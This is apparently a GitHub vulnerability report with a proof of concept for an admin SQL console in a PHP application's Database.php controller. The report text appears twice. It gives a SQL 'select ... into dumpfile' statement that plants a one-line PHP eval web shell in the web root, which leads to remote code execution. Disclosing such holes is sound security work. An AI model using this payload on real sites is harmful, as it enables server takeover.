You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
description
The input box for executing SQL statements in the backend database module can allow for bypassing, leading to the execution of a web shell and thereby achieving file upload.
The vulnerable directory is as follows:application\admin\controller\Database.php
process
The following sentence should be entered into the input box:
/**/select '<?php @eval($_POST[1]);' into dumpfile 'root directory/1.php'
result
Accessing the filename of the file just uploaded to the website's root directory can achieve Remote Code Execution (RCE).
screenshot
1、upload
2、access
The text was updated successfully, but these errors were encountered:
POC
version
2024.1000.4043
description
The input box for executing SQL statements in the backend database module can allow for bypassing, leading to the execution of a web shell and thereby achieving file upload.
The vulnerable directory is as follows:application\admin\controller\Database.php
process
The following sentence should be entered into the input box:
/**/select '<?php @eval($_POST[1]);' into dumpfile 'root directory/1.php'
result
Accessing the filename of the file just uploaded to the website's root directory can achieve Remote Code Execution (RCE).
screenshot
1、upload
2、access
The text was updated successfully, but these errors were encountered: